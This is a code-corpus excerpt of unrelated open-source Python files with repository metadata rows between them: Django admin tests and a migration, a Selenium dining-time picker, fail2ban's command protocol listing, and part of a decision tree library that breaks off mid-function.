"CityInline.readonly_fields[0], 'i_dont_exist' is not a callable or an attribute of 'CityInline' or found in the model 'City'.",
validate_inline,
CityInline, None, State)
def test_extra(self):
class SongAdmin(admin.ModelAdmin):
def awesome_song(self, instance):
if instance.title == "Born to Run":
return "Best Ever!"
return "Status unknown."
validate(SongAdmin, Song)
def test_readonly_lambda(self):
class SongAdmin(admin.ModelAdmin):
readonly_fields = (lambda obj: "test",)
validate(SongAdmin, Song)
def test_graceful_m2m_fail(self):
"""
Regression test for #12203/#12237 - Fail more gracefully when a M2M field that
specifies the 'through' option is included in the 'fields' or the 'fieldsets'
ModelAdmin options.
"""
class BookAdmin(admin.ModelAdmin):
fields = ['authors']
self.assertRaisesMessage(ImproperlyConfigured,
"'BookAdmin.fields' can't include the ManyToManyField field 'authors' because 'authors' manually specifies a 'through' model.",
validate,
BookAdmin, Book)
def test_cannot_include_through(self):
class FieldsetBookAdmin(admin.ModelAdmin):
fieldsets = (
('Header 1', {'fields': ('name',)}),
('Header 2', {'fields': ('authors',)}),
)
self.assertRaisesMessage(ImproperlyConfigured,
"'FieldsetBookAdmin.fieldsets[1][1]['fields']' can't include the ManyToManyField field 'authors' because 'authors' manually specifies a 'through' model.",
validate,
FieldsetBookAdmin, Book)
def test_nested_fields(self):
class NestedFieldsAdmin(admin.ModelAdmin):
fields = ('price', ('name', 'subtitle'))
validate(NestedFieldsAdmin, Book)
def test_nested_fieldsets(self):
class NestedFieldsetAdmin(admin.ModelAdmin):
fieldsets = (
('Main', {'fields': ('price', ('name', 'subtitle'))}),
)
validate(NestedFieldsetAdmin, Book)
def test_explicit_through_override(self):
"""
Regression test for #12209 -- If the explicitly provided through model
is specified as a string, the admin should still be able use
Model.m2m_field.through
"""
class AuthorsInline(admin.TabularInline):
model = Book.authors.through
class BookAdmin(admin.ModelAdmin):
inlines = [AuthorsInline]
# If the through model is still a string (and hasn't been resolved to a model)
# the validation will fail.
validate(BookAdmin, Book)
def test_non_model_fields(self):
"""
Regression for ensuring ModelAdmin.fields can contain non-model fields
that broke with r11737
"""
class SongForm(forms.ModelForm):
extra_data = forms.CharField()
class Meta:
model = Song
class FieldsOnFormOnlyAdmin(admin.ModelAdmin):
form = SongForm
fields = ['title', 'extra_data']
validate(FieldsOnFormOnlyAdmin, Song)
def test_non_model_first_field(self):
"""
Regression for ensuring ModelAdmin.field can handle first elem being a
non-model field (test fix for UnboundLocalError introduced with r16225).
"""
class SongForm(forms.ModelForm):
extra_data = forms.CharField()
class Meta:
model = Song
class FieldsOnFormOnlyAdmin(admin.ModelAdmin):
form = SongForm
fields = ['extra_data', 'title']
validate(FieldsOnFormOnlyAdmin, Song)
| bsd-3-clause | 1,530,670,665,720,559,000 | 34.523132 | 167 | 0.619415 | false |
aestheticblasphemy/aestheticBlasphemy | pl_messages/migrations/0002_auto_20200828_2129.py | 1 | 1972 | # Generated by Django 3.1 on 2020-08-28 15:59
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('pl_messages', '0001_initial'),
]
operations = [
migrations.AlterField(
model_name='messages',
name='parent',
field=models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, to='pl_messages.messages'),
),
migrations.AlterField(
model_name='participantnotifications',
name='participant',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='notified_participant', to=settings.AUTH_USER_MODEL, verbose_name='Notification Participant'),
),
migrations.AlterField(
model_name='participantthreads',
name='participant',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='thread_participant', to=settings.AUTH_USER_MODEL, verbose_name='Thread Participant'),
),
migrations.AlterField(
model_name='participantthreads',
name='threads',
field=models.ManyToManyField(related_name='participant_threads', to='pl_messages.Thread', verbose_name='Participant Threads'),
),
migrations.AlterField(
model_name='thread',
name='last_message',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='last_message_in_thread', to='pl_messages.messages', verbose_name='Last Message'),
),
migrations.AlterField(
model_name='thread',
name='messages',
field=models.ManyToManyField(related_name='thread_messages', to='pl_messages.Messages', verbose_name='Thread Messages'),
),
]
| gpl-3.0 | 7,672,388,963,139,680,000 | 41.869565 | 188 | 0.647566 | false |
dmwyatt/disney.api | pages/timepicker.py | 1 | 3504 | import datetime
import logging
import os
import time
import re
import webbrowser
from dateutil import parser
from selenium import webdriver
from selenium.common.exceptions import WebDriverException, NoSuchElementException
from selenium.webdriver.support.select import Select
from helpers import roundTime, difference_in_minutes, format_dt
from pages.helpers import wait_for
logger = logging.getLogger(__name__)
class TimeNotBookableError(Exception):
pass
class BasicTimePicker:
select_selector = 'select#diningAvailabilityForm-searchTime'
def __init__(self, browser: webdriver.PhantomJS):
self.browser = browser
@property
def select_element(self):
return self.browser.find_element_by_css_selector(self.select_selector)
@property
def select(self):
return Select(self.select_element)
@property
def option_elements(self):
return self.select_element.find_elements_by_tag_name('option')
@property
def selectable_values(self):
return [x.get_attribute('value') for x in self.option_elements]
@property
def selectable_texts(self):
return [x.text for x in self.option_elements]
def select_exact_time(self, desired_dt: datetime.datetime):
the_time = desired_dt.strftime('%H:%M')
if not the_time in self.selectable_values:
raise TimeNotBookableError("Cannot select '{}' from {}".format(the_time, self.selectable_values))
self.select.select_by_value(the_time)
def select_time_with_leeway(self, desired_dt: datetime.datetime, leeway: int):
closest = None
closest_delta = None
for sv in self.selectable_values:
if not re.match('\d\d:\d\d', sv):
continue
sv_dt = time_to_datetime(sv, desired_dt)
if not closest:
closest = sv_dt
closest_delta = difference_in_minutes(desired_dt, closest)
curr_sv_delta = difference_in_minutes(sv_dt, desired_dt)
if curr_sv_delta < closest_delta:
closest = sv_dt
closest_delta = curr_sv_delta
if closest_delta <= leeway:
self.select_exact_time(closest)
else:
raise TimeNotBookableError("There is no selectable time that's "
"less than {} minutes from {} "
"in {}".format(leeway, format_dt(desired_dt), self.selectable_values))
def select_closest_time(self, desired_dt: datetime.datetime):
closest = None
closest_delta = None
for sv in self.selectable_values:
if not re.match('\d\d:\d\d', sv):
continue
sv_dt = time_to_datetime(sv, desired_dt)
if not closest:
closest = sv_dt
closest_delta = difference_in_minutes(desired_dt, closest)
curr_sv_delta = difference_in_minutes(sv_dt, desired_dt)
if curr_sv_delta < closest_delta:
closest = sv_dt
closest_delta = curr_sv_delta
self.select_exact_time(closest)
def select_meal(self, meal):
try:
self.select.select_by_visible_text(meal)
except NoSuchElementException:
raise TimeNotBookableError("Cannot select '{}' from {}".format(meal, self.selectable_texts))
def select_breakfast(self):
self.select_meal('Breakfast')
def select_lunch(self):
self.select_meal('Lunch')
def select_dinner(self):
self.select_meal('Dinner')
def time_to_datetime(the_time: str, reference_dt: datetime.datetime) -> datetime.datetime:
"""
Takes a string representing a time and a datetime.datetime that represents the day that time
is on, and returns a datetime.datetime on that day with the new time.
"""
dt = parser.parse(the_time)
return dt.replace(year=reference_dt.year, month=reference_dt.month, day=reference_dt.day)
| mit | 4,530,609,695,152,849,400 | 27.958678 | 100 | 0.720034 | false |
jakesyl/fail2ban | fail2ban/protocol.py | 1 | 9025 | # emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: t -*-
# vi: set ft=python sts=4 ts=4 sw=4 noet :
# This file is part of Fail2Ban.
#
# Fail2Ban is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# Fail2Ban is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with Fail2Ban; if not, write to the Free Software
# Foundation, Inc., 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301, USA.
# Author: Cyril Jaquier
#
__author__ = "Cyril Jaquier"
__copyright__ = "Copyright (c) 2004 Cyril Jaquier"
__license__ = "GPL"
import textwrap
##
# Describes the protocol used to communicate with the server.
protocol = [
['', "BASIC", ""],
["start", "starts the server and the jails"],
["reload", "reloads the configuration"],
["reload <JAIL>", "reloads the jail <JAIL>"],
["stop", "stops all jails and terminate the server"],
["status", "gets the current status of the server"],
["ping", "tests if the server is alive"],
["help", "return this output"],
["version", "return the server version"],
['', "LOGGING", ""],
["set loglevel <LEVEL>", "sets logging level to <LEVEL>. Levels: CRITICAL, ERROR, WARNING, NOTICE, INFO, DEBUG"],
["get loglevel", "gets the logging level"],
["set logtarget <TARGET>", "sets logging target to <TARGET>. Can be STDOUT, STDERR, SYSLOG or a file"],
["get logtarget", "gets logging target"],
["flushlogs", "flushes the logtarget if a file and reopens it. For log rotation."],
['', "DATABASE", ""],
["set dbfile <FILE>", "set the location of fail2ban persistent datastore. Set to \"None\" to disable"],
["get dbfile", "get the location of fail2ban persistent datastore"],
["set dbpurgeage <SECONDS>", "sets the max age in <SECONDS> that history of bans will be kept"],
["get dbpurgeage", "gets the max age in seconds that history of bans will be kept"],
['', "JAIL CONTROL", ""],
["add <JAIL> <BACKEND>", "creates <JAIL> using <BACKEND>"],
["start <JAIL>", "starts the jail <JAIL>"],
["stop <JAIL>", "stops the jail <JAIL>. The jail is removed"],
["status <JAIL> [FLAVOR]", "gets the current status of <JAIL>, with optional flavor or extended info"],
['', "JAIL CONFIGURATION", ""],
["set <JAIL> idle on|off", "sets the idle state of <JAIL>"],
["set <JAIL> addignoreip <IP>", "adds <IP> to the ignore list of <JAIL>"],
["set <JAIL> delignoreip <IP>", "removes <IP> from the ignore list of <JAIL>"],
["set <JAIL> addlogpath <FILE> ['tail']", "adds <FILE> to the monitoring list of <JAIL>, optionally starting at the 'tail' of the file (default 'head')."],
["set <JAIL> dellogpath <FILE>", "removes <FILE> from the monitoring list of <JAIL>"],
["set <JAIL> logencoding <ENCODING>", "sets the <ENCODING> of the log files for <JAIL>"],
["set <JAIL> addjournalmatch <MATCH>", "adds <MATCH> to the journal filter of <JAIL>"],
["set <JAIL> deljournalmatch <MATCH>", "removes <MATCH> from the journal filter of <JAIL>"],
["set <JAIL> addfailregex <REGEX>", "adds the regular expression <REGEX> which must match failures for <JAIL>"],
["set <JAIL> delfailregex <INDEX>", "removes the regular expression at <INDEX> for failregex"],
["set <JAIL> ignorecommand <VALUE>", "sets ignorecommand of <JAIL>"],
["set <JAIL> addignoreregex <REGEX>", "adds the regular expression <REGEX> which should match pattern to exclude for <JAIL>"],
["set <JAIL> delignoreregex <INDEX>", "removes the regular expression at <INDEX> for ignoreregex"],
["set <JAIL> findtime <TIME>", "sets the number of seconds <TIME> for which the filter will look back for <JAIL>"],
["set <JAIL> bantime <TIME>", "sets the number of seconds <TIME> a host will be banned for <JAIL>"],
["set <JAIL> datepattern <PATTERN>", "sets the <PATTERN> used to match date/times for <JAIL>"],
["set <JAIL> usedns <VALUE>", "sets the usedns mode for <JAIL>"],
["set <JAIL> banip <IP>", "manually Ban <IP> for <JAIL>"],
["set <JAIL> unbanip <IP>", "manually Unban <IP> in <JAIL>"],
["set <JAIL> maxretry <RETRY>", "sets the number of failures <RETRY> before banning the host for <JAIL>"],
["set <JAIL> maxlines <LINES>", "sets the number of <LINES> to buffer for regex search for <JAIL>"],
["set <JAIL> addaction <ACT>[ <PYTHONFILE> <JSONKWARGS>]", "adds a new action named <NAME> for <JAIL>. Optionally for a Python based action, a <PYTHONFILE> and <JSONKWARGS> can be specified, else will be a Command Action"],
["set <JAIL> delaction <ACT>", "removes the action <ACT> from <JAIL>"],
["", "COMMAND ACTION CONFIGURATION", ""],
["set <JAIL> action <ACT> actionstart <CMD>", "sets the start command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actionstop <CMD>", "sets the stop command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actioncheck <CMD>", "sets the check command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actionban <CMD>", "sets the ban command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> actionunban <CMD>", "sets the unban command <CMD> of the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> timeout <TIMEOUT>", "sets <TIMEOUT> as the command timeout in seconds for the action <ACT> for <JAIL>"],
["", "GENERAL ACTION CONFIGURATION", ""],
["set <JAIL> action <ACT> <PROPERTY> <VALUE>", "sets the <VALUE> of <PROPERTY> for the action <ACT> for <JAIL>"],
["set <JAIL> action <ACT> <METHOD>[ <JSONKWARGS>]", "calls the <METHOD> with <JSONKWARGS> for the action <ACT> for <JAIL>"],
['', "JAIL INFORMATION", ""],
["get <JAIL> logpath", "gets the list of the monitored files for <JAIL>"],
["get <JAIL> logencoding", "gets the encoding of the log files for <JAIL>"],
["get <JAIL> journalmatch", "gets the journal filter match for <JAIL>"],
["get <JAIL> ignoreip", "gets the list of ignored IP addresses for <JAIL>"],
["get <JAIL> ignorecommand", "gets ignorecommand of <JAIL>"],
["get <JAIL> failregex", "gets the list of regular expressions which matches the failures for <JAIL>"],
["get <JAIL> ignoreregex", "gets the list of regular expressions which matches patterns to ignore for <JAIL>"],
["get <JAIL> findtime", "gets the time for which the filter will look back for failures for <JAIL>"],
["get <JAIL> bantime", "gets the time a host is banned for <JAIL>"],
["get <JAIL> datepattern", "gets the patern used to match date/times for <JAIL>"],
["get <JAIL> usedns", "gets the usedns setting for <JAIL>"],
["get <JAIL> maxretry", "gets the number of failures allowed for <JAIL>"],
["get <JAIL> maxlines", "gets the number of lines to buffer for <JAIL>"],
["get <JAIL> actions", "gets a list of actions for <JAIL>"],
["", "COMMAND ACTION INFORMATION",""],
["get <JAIL> action <ACT> actionstart", "gets the start command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actionstop", "gets the stop command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actioncheck", "gets the check command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actionban", "gets the ban command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> actionunban", "gets the unban command for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> timeout", "gets the command timeout in seconds for the action <ACT> for <JAIL>"],
["", "GENERAL ACTION INFORMATION", ""],
["get <JAIL> actionproperties <ACT>", "gets a list of properties for the action <ACT> for <JAIL>"],
["get <JAIL> actionmethods <ACT>", "gets a list of methods for the action <ACT> for <JAIL>"],
["get <JAIL> action <ACT> <PROPERTY>", "gets the value of <PROPERTY> for the action <ACT> for <JAIL>"],
]
##
# Prints the protocol in a "man" format. This is used for the
# "-h" output of fail2ban-client.
def printFormatted():
INDENT=4
MARGIN=41
WIDTH=34
firstHeading = False
for m in protocol:
if m[0] == '' and firstHeading:
print
firstHeading = True
first = True
if len(m[0]) >= MARGIN:
m[1] = ' ' * WIDTH + m[1]
for n in textwrap.wrap(m[1], WIDTH, drop_whitespace=False):
if first:
line = ' ' * INDENT + m[0] + ' ' * (MARGIN - len(m[0])) + n.strip()
first = False
else:
line = ' ' * (INDENT + MARGIN) + n.strip()
print line
##
# Prints the protocol in a "mediawiki" format.
def printWiki():
firstHeading = False
for m in protocol:
if m[0] == '':
if firstHeading:
print "|}"
__printWikiHeader(m[1], m[2])
firstHeading = True
else:
print "|-"
print "| <span style=\"white-space:nowrap;\"><tt>" + m[0] + "</tt></span> || || " + m[1]
print "|}"
def __printWikiHeader(section, desc):
print
print "=== " + section + " ==="
print
print desc
print
print "{|"
print "| '''Command''' || || '''Description'''"
| gpl-2.0 | -5,112,870,207,491,845,000 | 53.041916 | 224 | 0.668033 | false |
aravindalwan/unyque | unyque/rdimension.py | 1 | 3726 | '''Representation of a random variable used in stochastic collocation'''
__copyright__ = 'Copyright (C) 2011 Aravind Alwan'
__license__ = '''
This file is part of UnyQuE.
UnyQuE is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
UnyQuE is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
For a copy of the GNU General Public License, please see
<http://www.gnu.org/licenses/>.
'''
class RandomDimension(object):
'''Random dimension object that encapsulates the operations along one of the
dimensions in random space, which corresponds to one of the random variables
'''
kmax = 0
nodes = None
def __init__(self, bound):
self._bound = bound
@classmethod
def set_maximum_interp_level(cls, value):
cls.kmax = value
cls._init_nodes()
@classmethod
def _init_nodes(cls):
'''Initialize nodes in a hierarchical fashion as a list of sublists,
where each sublist contains the nodes added at the corresponding level
'''
cls.nodes = []
if cls.kmax > 0:
cls.nodes.append([0.5])
if cls.kmax > 1:
cls.nodes.append([0.0, 1.0])
if cls.kmax > 2:
for k in xrange(3, cls.kmax+1):
cls.nodes.append([
(1.0 + 2.0*j)/(2**(k-1)) for j in xrange(2**(k-2))])
def get_node(self, level, idx, normalized = False):
'''Return the scaled coordinates of a node at the given level and index
'''
if normalized:
return self.nodes[level-1][idx]
else:
lo = self._bound[0]
hi = self._bound[1]
return lo + (hi-lo)*self.nodes[level-1][idx]
@classmethod
def _interpolate(cls, pt1, x2):
'''Evaluate basis function centered at pt1, at x2. pt1 has to be a
tuple of the form (level, index) that specifies the interpolation level
and the index of the node at that level. x2 is any float value between
0 and 1, specifying the location where the basis function is to be
evaluated.
'''
level1, idx1 = pt1
x1 = cls.nodes[level1-1][idx1]
if level1 == 1:
return 1.0
else:
m = 2**(level1-1) + 1 # Number of nodes at this level
return (abs(x1-x2) < 1./(m-1)) * (1. - (m-1)*abs(x1-x2))
def interpolate(self, pt1, x):
'''Evaluate basis function centered at pt1, at the location x. This
method scales x to be in [0,1] and calls _interpolate to get the actual
interpolated value
'''
lo = self._bound[0]
hi = self._bound[1]
if lo <= x <= hi:
return self._interpolate(pt1, float(x-lo)/float(hi-lo))
else:
return 0.
def get_basis_function(self, pt):
'''Return bounds of the piece-wise linear basis function centered at pt.
'''
lo = self._bound[0]
hi = self._bound[1]
level, idx = pt
if level == 1:
return (lo, hi, pt)
elif level == 2:
lo = (lo + hi)/2 if idx == 1 else lo
hi = (lo + hi)/2 if idx == 0 else hi
return (lo, hi, pt)
else:
m = 2**(level-1) + 1 # Number of nodes at this level
x = lo + (hi-lo)*self.nodes[level-1][idx]
return (x-(hi-lo)/(m-1), x+(hi-lo)/(m-1), pt)
| gpl-3.0 | -7,993,344,271,732,080,000 | 31.973451 | 80 | 0.580247 | false |
chrisspen/dtree | dtree.py | 1 | 68634 | """
2012.1.24 CKS
Algorithms for building and using a decision tree for classification or regression.
"""
from __future__ import print_function
from collections import defaultdict
from decimal import Decimal
from pprint import pprint
import copy
import csv
import math
from math import pi
import os
import random
import re
import unittest
import pickle
VERSION = (2, 0, 0)
__version__ = '.'.join(map(str, VERSION))
# Traditional entropy.
ENTROPY1 = 'entropy1'
# Modified entropy that penalizes universally unique values.
ENTROPY2 = 'entropy2'
# Modified entropy that penalizes universally unique values
# as well as features with large numbers of values.
ENTROPY3 = 'entropy3'
DISCRETE_METRICS = [
ENTROPY1,
ENTROPY2,
ENTROPY3,
]
# Simple statistical variance, the measure of how far a set of numbers
# is spread out.
VARIANCE1 = 'variance1'
# Like ENTROPY2, is the variance weighted to penalize attributes with
# universally unique values.
VARIANCE2 = 'variance2'
CONTINUOUS_METRICS = [
VARIANCE1,
VARIANCE2,
]
DEFAULT_DISCRETE_METRIC = ENTROPY1
DEFAULT_CONTINUOUS_METRIC = VARIANCE1
# Methods for aggregating the predictions of trees in a forest.
EQUAL_MEAN = 'equal-mean'
WEIGHTED_MEAN = 'weighted-mean'
BEST = 'best'
AGGREGATION_METHODS = [
EQUAL_MEAN,
WEIGHTED_MEAN,
BEST,
]
# Forest growth algorithms.
GROW_RANDOM = 'random'
GROW_AUTO_MINI_BATCH = 'auto-mini-batch'
GROW_AUTO_INCREMENTAL = 'auto-incremental'
GROW_METHODS = [
GROW_RANDOM,
GROW_AUTO_MINI_BATCH,
GROW_AUTO_INCREMENTAL,
]
# Data format names.
ATTR_TYPE_NOMINAL = NOM = 'nominal'
ATTR_TYPE_DISCRETE = DIS = 'discrete'
ATTR_TYPE_CONTINUOUS = CON = 'continuous'
ATTR_MODE_CLASS = CLS = 'class'
ATTR_HEADER_PATTERN = re.compile("([^,:]+):(nominal|discrete|continuous)(?::(class))?")
def get_mean(seq):
"""
Batch mean calculation.
"""
return sum(seq)/float(len(seq))
def get_variance(seq):
"""
Batch variance calculation.
"""
m = get_mean(seq)
return sum((v-m)**2 for v in seq)/float(len(seq))
def standard_deviation(seq):
return math.sqrt(get_variance(seq))
def mean_absolute_error(seq, correct):
"""
Batch mean absolute error calculation.
"""
assert len(seq) == len(correct)
diffs = [abs(a-b) for a, b in zip(seq, correct)]
return sum(diffs)/float(len(diffs))
def normalize(seq):
"""
Scales each number in the sequence so that the sum of all numbers equals 1.
"""
s = float(sum(seq))
return [v/s for v in seq]
def erfcc(x):
"""
Complementary error function.
"""
z = abs(x)
t = 1. / (1. + 0.5*z)
r = t * math.exp(-z*z-1.26551223+t*(1.00002368+t*(.37409196+
t*(.09678418+t*(-.18628806+t*(.27886807+
t*(-1.13520398+t*(1.48851587+t*(-.82215223+
t*.17087277)))))))))
if (x >= 0.):
return r
else:
return 2. - r
def normcdf(x, mu, sigma):
"""
Describes the probability that a real-valued random variable X with a given
probability distribution will be found at a value less than or equal to X
in a normal distribution.
http://en.wikipedia.org/wiki/Cumulative_distribution_function
"""
t = x-mu
y = 0.5*erfcc(-t/(sigma*math.sqrt(2.0)))
if y > 1.0:
y = 1.0
return y
def normpdf(x, mu, sigma):
"""
Describes the relative likelihood that a real-valued random variable X will
take on a given value.
http://en.wikipedia.org/wiki/Probability_density_function
"""
u = (x-mu)/abs(sigma)
y = (1/(math.sqrt(2*pi)*abs(sigma)))*math.exp(-u*u/2)
return y
def normdist(x, mu, sigma, f=True):
if f:
y = normcdf(x, mu, sigma)
else:
y = normpdf(x, mu, sigma)
return y
def normrange(x1, x2, mu, sigma, f=True):
p1 = normdist(x1, mu, sigma, f)
p2 = normdist(x2, mu, sigma, f)
return abs(p1-p2)
def cmp(a, b): # pylint: disable=redefined-builtin
return (a > b) - (a < b)
class DDist:
"""
Incrementally tracks the probability distribution of discrete elements.
"""
def __init__(self, seq=None):
self.clear()
if seq:
for k in seq:
self.counts[k] += 1
self.total += 1
def __cmp__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return cmp(
(frozenset(self.counts.items()), self.total),
(frozenset(other.counts.items()), other.total)
)
def __eq__(self, other):
if not isinstance(other, type(self)):
return NotImplemented
return (frozenset(self.counts.items()), self.total) == \
(frozenset(other.counts.items()), other.total)
def __getitem__(self, k):
"""
Returns the probability for the given element.
"""
cnt = 0
if k in self.counts:
cnt = self.counts[k]
return cnt/float(self.total)
def __hash__(self):
return hash((frozenset(self.counts.items()), self.total))
def __repr__(self):
s = []
for k, prob in self.probs:
s.append("%s=%s" % (k, prob))
return "<%s %s>" % (type(self).__name__, ', '.join(s))
def add(self, k, count=1):
"""
Increments the count for the given element.
"""
self.counts[k] += count
self.total += count
@property
def best(self):
"""
Returns the element with the highest probability.
"""
b = (-1e999999, None)
for k, c in self.counts.items():
b = max(b, (c, k))
return b[1]
@property
def best_prob(self):
probs = self.probs
if not probs:
return
best = -1e999999
for _, prob in probs:
best = max(best, prob)
return best
def clear(self):
self.counts = defaultdict(int)
self.total = 0
def copy(self):
return copy.deepcopy(self)
@property
def count(self):
"""
The total number of samples forming this distribution.
"""
return self.total
def keys(self):
return self.counts.keys()
@property
def probs(self):
"""
Returns a list of probabilities for all elements in the form
[(value1,prob1),(value2,prob2),...].
"""
return [
(k, self.counts[k]/float(self.total))
for k in self.counts.keys()
]
def update(self, dist):
"""
Adds the given distribution's counts to the current distribution.
"""
assert isinstance(dist, DDist)
for k, c in dist.counts.items():
self.counts[k] += c
self.total += dist.total
class CDist:
"""
Incrementally tracks the probability distribution of continuous numbers.
"""
def __init__(self, seq=None, mean=None, var=None, stdev=None):
self.clear()
if mean is not None:
self.mean_sum = mean
self.mean_count = 1
if var is not None:
self.last_variance = var
self.mean_count = 1
if stdev is not None:
self.last_variance = stdev**2
self.mean_count = 1
if seq:
for n in seq:
self += n
def clear(self):
self.mean_sum = 0
self.mean_count = 0
self.last_variance = 0
def copy(self):
return copy.deepcopy(self)
def __repr__(self):
return "<%s mean=%s variance=%s>" % (type(self).__name__, self.mean, self.variance)
def __iadd__(self, value):
last_mean = self.mean
self.mean_sum += value
self.mean_count += 1
if last_mean is not None:
self.last_variance = self.last_variance \
+ (value - last_mean)*(value - self.mean)
return self
@property
def count(self):
"""
The total number of samples forming this distribution.
"""
return self.mean_count
@property
def mean(self):
if self.mean_count:
return self.mean_sum/float(self.mean_count)
@property
def variance(self):
if self.mean_count:
return self.last_variance/float(self.mean_count)
@property
def standard_deviation(self):
var = self.variance
if var is None:
return
return math.sqrt(var)
def probability_lt(self, x):
"""
Returns the probability of a random variable being less than the
given value.
"""
if self.mean is None:
return
return normdist(x=x, mu=self.mean, sigma=self.standard_deviation)
def probability_in(self, a, b):
"""
Returns the probability of a random variable falling between the given
values.
"""
if self.mean is None:
return
p1 = normdist(x=a, mu=self.mean, sigma=self.standard_deviation)
p2 = normdist(x=b, mu=self.mean, sigma=self.standard_deviation)
return abs(p1 - p2)
def probability_gt(self, x):
"""
Returns the probability of a random variable being greater than the
given value.
"""
if self.mean is None:
return
p = normdist(x=x, mu=self.mean, sigma=self.standard_deviation)
return 1-p
def entropy(data, class_attr=None, method=DEFAULT_DISCRETE_METRIC):
"""
Calculates the entropy of the attribute attr in given data set data.
Parameters:
data<dict|list> :=
if dict, treated as value counts of the given attribute name
if list, treated as a raw list from which the value counts will be generated
attr<string> := the name of the class attribute
"""
assert (class_attr is None and isinstance(data, dict)) or (class_attr is not None and isinstance(data, list))
if isinstance(data, dict):
counts = data
else:
counts = defaultdict(float) # {attr:count}
for record in data:
# Note: A missing attribute is treated like an attribute with a value
# of None, representing the attribute is "irrelevant".
counts[record.get(class_attr)] += 1.0
len_data = float(sum(cnt for _, cnt in counts.items()))
n = max(2, len(counts))
total = float(sum(counts.values()))
assert total, "There must be at least one non-zero count."
if method == ENTROPY1:
return -sum((count/len_data)*math.log(count/len_data, n)
for count in counts.values() if count)
elif method == ENTROPY2:
return -sum((count/len_data)*math.log(count/len_data, n)
for count in counts.values() if count) - ((len(counts)-1)/float(total))
elif method == ENTROPY3:
return -sum((count/len_data)*math.log(count/len_data, n)
for count in counts.values() if count) - 100*((len(counts)-1)/float(total))
else:
raise Exception("Unknown entropy method %s." % method)
def entropy_variance(data, class_attr=None,
method=DEFAULT_CONTINUOUS_METRIC):
"""
Calculates the variance fo a continuous class attribute, to be used as an
entropy metric.
"""
assert method in CONTINUOUS_METRICS, "Unknown entropy variance metric: %s" % (method,)
assert (class_attr is None and isinstance(data, dict)) or (class_attr is not None and isinstance(data, list))
if isinstance(data, dict):
lst = data
else:
lst = [record.get(class_attr) for record in data]
return get_variance(lst)
def get_gain(data, attr, class_attr,
method=DEFAULT_DISCRETE_METRIC,
only_sub=0, prefer_fewer_values=False, entropy_func=None):
"""
Calculates the information gain (reduction in entropy) that would
result by splitting the data on the chosen attribute (attr).
Parameters:
prefer_fewer_values := Weights the gain by the count of the attribute's
unique values. If multiple attributes have the same gain, but one has
slightly fewer attributes, this will cause the one with fewer
attributes to be preferred.
"""
entropy_func = entropy_func or entropy
val_freq = defaultdict(float)
subset_entropy = 0.0
# Calculate the frequency of each of the values in the target attribute
for record in data:
val_freq[record.get(attr)] += 1.0
# Calculate the sum of the entropy for each subset of records weighted
# by their probability of occuring in the training set.
for val in val_freq.keys():
val_prob = val_freq[val] / sum(val_freq.values())
data_subset = [record for record in data if record.get(attr) == val]
e = entropy_func(data_subset, class_attr, method=method)
subset_entropy += val_prob * e
if only_sub:
return subset_entropy
# Subtract the entropy of the chosen attribute from the entropy of the
# whole data set with respect to the target attribute (and return it)
main_entropy = entropy_func(data, class_attr, method=method)
# Prefer gains on attributes with fewer values.
if prefer_fewer_values:
return ((main_entropy - subset_entropy), 1./len(val_freq))
else:
return (main_entropy - subset_entropy)
def gain_variance(*args, **kwargs):
"""
Calculates information gain using variance as the comparison metric.
"""
return get_gain(entropy_func=entropy_variance, *args, **kwargs)
def majority_value(data, class_attr):
"""
Creates a list of all values in the target attribute for each record
in the data list object, and returns the value that appears in this list
the most frequently.
"""
if is_continuous(data[0][class_attr]):
return CDist(seq=[record[class_attr] for record in data])
else:
return most_frequent([record[class_attr] for record in data])
def most_frequent(lst):
"""
Returns the item that appears most frequently in the given list.
"""
lst = lst[:]
highest_freq = 0
most_freq = None
for val in unique(lst):
if lst.count(val) > highest_freq:
most_freq = val
highest_freq = lst.count(val)
return most_freq
def unique(lst):
"""
Returns a list made up of the unique values found in lst. i.e., it
removes the redundant values in lst.
"""
lst = lst[:]
unique_lst = []
# Cycle through the list and add each value to the unique list only once.
for item in lst:
if unique_lst.count(item) <= 0:
unique_lst.append(item)
# Return the list with all redundant values removed.
return unique_lst
def get_values(data, attr):
"""
Creates a list of values in the chosen attribut for each record in data,
prunes out all of the redundant values, and return the list.
"""
return unique([record[attr] for record in data])
def choose_attribute(data, attributes, class_attr, fitness, method):
"""
Cycles through all the attributes and returns the attribute with the
highest information gain (or lowest entropy).
"""
best = (-1e999999, None)
for attr in attributes:
if attr == class_attr:
continue
gain = fitness(data, attr, class_attr, method=method)
best = max(best, (gain, attr))
return best[1]
def is_continuous(v):
return isinstance(v, (float, Decimal))
def create_decision_tree(data, attributes, class_attr, fitness_func, wrapper, **kwargs):
"""
Returns a new decision tree based on the examples given.
"""
